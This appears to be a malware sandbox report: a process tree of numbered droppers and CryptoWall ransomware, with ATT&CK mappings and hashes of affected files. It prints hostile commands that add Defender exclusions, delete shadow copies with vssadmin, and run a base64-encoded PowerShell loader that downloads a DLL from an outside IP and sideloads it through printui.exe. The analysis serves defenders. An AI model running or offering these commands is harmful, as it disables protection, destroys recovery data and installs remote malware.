    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\14.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4368
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '14.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5108
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5548
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5896
  - - C:\Users\Admin\AppData\Local\Temp\13.exe
      "C:\Users\Admin\AppData\Local\Temp\13.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3004
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\13.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4484
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '13.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4284
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4400
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4292
  - - C:\Users\Admin\AppData\Local\Temp\12.exe
      "C:\Users\Admin\AppData\Local\Temp\12.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2336
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\12.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4128
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '12.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4300
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4412
  - - C:\Users\Admin\AppData\Local\Temp\11.exe
      "C:\Users\Admin\AppData\Local\Temp\11.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1572
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\11.exe'
        5⤵
        
        PID:6504
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '11.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        
        PID:5732
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        
        PID:6652
  - - C:\Users\Admin\AppData\Local\Temp\10.exe
      "C:\Users\Admin\AppData\Local\Temp\10.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2520
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\10.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4200
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '10.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1308
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5368
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4564
  - - C:\Users\Admin\AppData\Local\Temp\9.exe
      "C:\Users\Admin\AppData\Local\Temp\9.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1744
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\9.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4656
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5724
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4448
  - - C:\Users\Admin\AppData\Local\Temp\8.exe
      "C:\Users\Admin\AppData\Local\Temp\8.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      PID:1624
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\8.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4256
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '8.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6040
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4768
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4616
  - - C:\Users\Admin\AppData\Local\Temp\7.exe
      "C:\Users\Admin\AppData\Local\Temp\7.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1052
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4588
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4328
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5752
  - - C:\Users\Admin\AppData\Local\Temp\6.exe
      "C:\Users\Admin\AppData\Local\Temp\6.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\6.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3300
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '6.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6596
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3088
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7156
  - - C:\Users\Admin\AppData\Local\Temp\5.exe
      "C:\Users\Admin\AppData\Local\Temp\5.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5348
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5.exe'
        5⤵
        
        PID:3100
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        
        PID:4560
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        
        PID:1308
  - - C:\Users\Admin\AppData\Local\Temp\4.exe
      "C:\Users\Admin\AppData\Local\Temp\4.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      PID:228
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\4.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4764
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '4.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4180
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4380
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6044
  - - C:\Users\Admin\AppData\Local\Temp\3.exe
      "C:\Users\Admin\AppData\Local\Temp\3.exe"
      4⤵
      Executes dropped EXE
      PID:1380
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\3.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4000
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '3.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3936
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3264
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        
        PID:5176
  - - C:\Users\Admin\AppData\Local\Temp\2.exe
      "C:\Users\Admin\AppData\Local\Temp\2.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      PID:2608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4628
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4388
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4712
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5756
  - - C:\Users\Admin\AppData\Local\Temp\1.exe
      "C:\Users\Admin\AppData\Local\Temp\1.exe"
      4⤵
      Executes dropped EXE
      PID:1824
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'
        5⤵
        
        PID:6656
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        
        PID:4248
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5452
- - C:\Users\Admin\AppData\Local\Temp\CryptoWall.exe
    "C:\Users\Admin\AppData\Local\Temp\CryptoWall.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\syswow64\explorer.exe
      "C:\Windows\syswow64\explorer.exe"
      4⤵
      Drops startup file
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:2768
    - - C:\Windows\syswow64\svchost.exe
        
        -k netsvcs
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1532
    - - C:\Windows\syswow64\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        System Location Discovery: System Language Discovery
        Interacts with shadow copies
        
        PID:2116
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yICg7Oyl7DQoJKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzM3LjEuMTk2LjM1L3VuMi9ib3R1aS5kYXQiLCAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIik7DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyA2MDsNCgl9DQp9')); Invoke-Expression $decoded;"
  2⤵
  PID:5764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yICg7Oyl7DQoJKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzM3LjEuMTk2LjM1L3VuMi9ib3R1aS5kYXQiLCAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIik7DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyA2MDsNCgl9DQp9')); Invoke-Expression $decoded;"
    3⤵
    - Blocklisted process makes network request
    - Drops file in System32 directory
    PID:3220

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "524507630-1391318332-311102784-2068190226-870295663-1606791424111895148-842353855"
1⤵
PID:4588

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "134787505016512243492016747239-85773315-163176377-1368776925-7509672572062838786"
1⤵
PID:4292

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt

Filesize
27KB

MD5
85ae6841554b5cf7039c33aab6239786

SHA1
ce042bc5f89fe3ba3ecc6f4f7251704ce2ed6da5

SHA256
3643e0850359d8f0b247e72703d37366dadaa410b5213f185ece5a2c23f4b03f

SHA512
17a5e0724ee9cb710b39d00072267e51d50485cc948a15792bbe53450d9bf54902d7ae54d159dce6cca77cad3cd26ab10f118824cf0a0384de5613a1cb318794

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK

Filesize
635B

MD5
cc081bb8acb2ce36fb0db9c69ff67821

SHA1
266713a1e11be9bdf420d81cef7cdbdf087edd95

SHA256
d85c5f31d4e0a6937610a232ac7ec71b779289133573589c3b7e3adf907a9d90

SHA512
34f9b74bfb44ed1d0714baded97349e30eeb69a52e5754afe403222709e73982f98b9d476d33cb4178469ec1d62fe83f0a2c5b7ad935c2c9ff9ee0c8b2b88e80

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK

Filesize
634B

MD5
2ea773d2d2cacaae5659a035c000097b

SHA1
f0995a43669f4f2c09743d9a5cc1f9e21977a0a4

SHA256
7fc8ebd6857c49cf22187e50b1d7ac22f62b6727fe5d0f0141d168106445fa1b

SHA512
3bce40480303bfc524c11acb567571d38a153f25dd7c11314602969a0219c622e2bc0278d090c97867e192a2d2c1ce04c5cbc94b7531712caddcd2145f2b4731

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

Filesize
862B

MD5
556337c84f8a4531c452046bacbd4724

SHA1
ae9db8ff2a3bf66a6434a03f2f2b0faf960774a4

SHA256
b50b1cdf6ae59066c33ae5ddc17e5f0e569dc7eb37ac8779deee2c4d55863f83

SHA512
3e7cf78c4ef304aabd2b0832788a4e6f7312eceb461aef2ffb406f370a89a497043fafdb618910294e20e91c90663c91ceae2a3675c3b902a9cd5720500088ed

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF

Filesize
743B

MD5
d4909ed353bf5977dfa6fd8f3baf9135

SHA1
853a5afa8906ff9633b8ce9a72706ca480cb8cbc

SHA256
16db550a63ac23d4da32bd5463f02b7949fd915881c05ca169f1d642c6a7d541

SHA512
cac83ae10edfcbb3f283594200ddd1cc848e9fe1c53e3768319b5eeaae9ad6216ed77c9ecf0b87be477f208e92d23b95a882c267bcde36b24c31c321cccfec45

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\SIST02.XSL

Filesize
239KB

MD5
1f745d59254a61a3c579cc1f065562ff

SHA1
c0068048e9008cbb95f029c53c725182511aa6cf

SHA256
74d043bbacc71119dd572a7b8f6144abbb1f464cbe7a707447dcb42dd9e212b3

SHA512
d26ee34431a6f26253cc0611af93505e8f397139955ede464548d2f0e58c08071edd2081ca2ab53ada909663ce0cb04bfeb1d095d018aafdd4610c5a881f99f5

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF

Filesize
24KB

MD5
329e0ec77897b75a4aad6a098eeaefc3

SHA1
4410d8ef369d422808742e6678fbc4667a01f7fd

SHA256
32aa9b84e616da840d52b827b558a87c46210cf787ba35fe55b2f8dd2b72e145

SHA512
6c84c16d7ee3ac73e1be1b7b080f42d10fa6648185a398611166e63a09df77bce86b4f520c7f7c9e620732d9327af7065db186487496a0b594517a4452b3b3f0

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\BUTTON.GIF

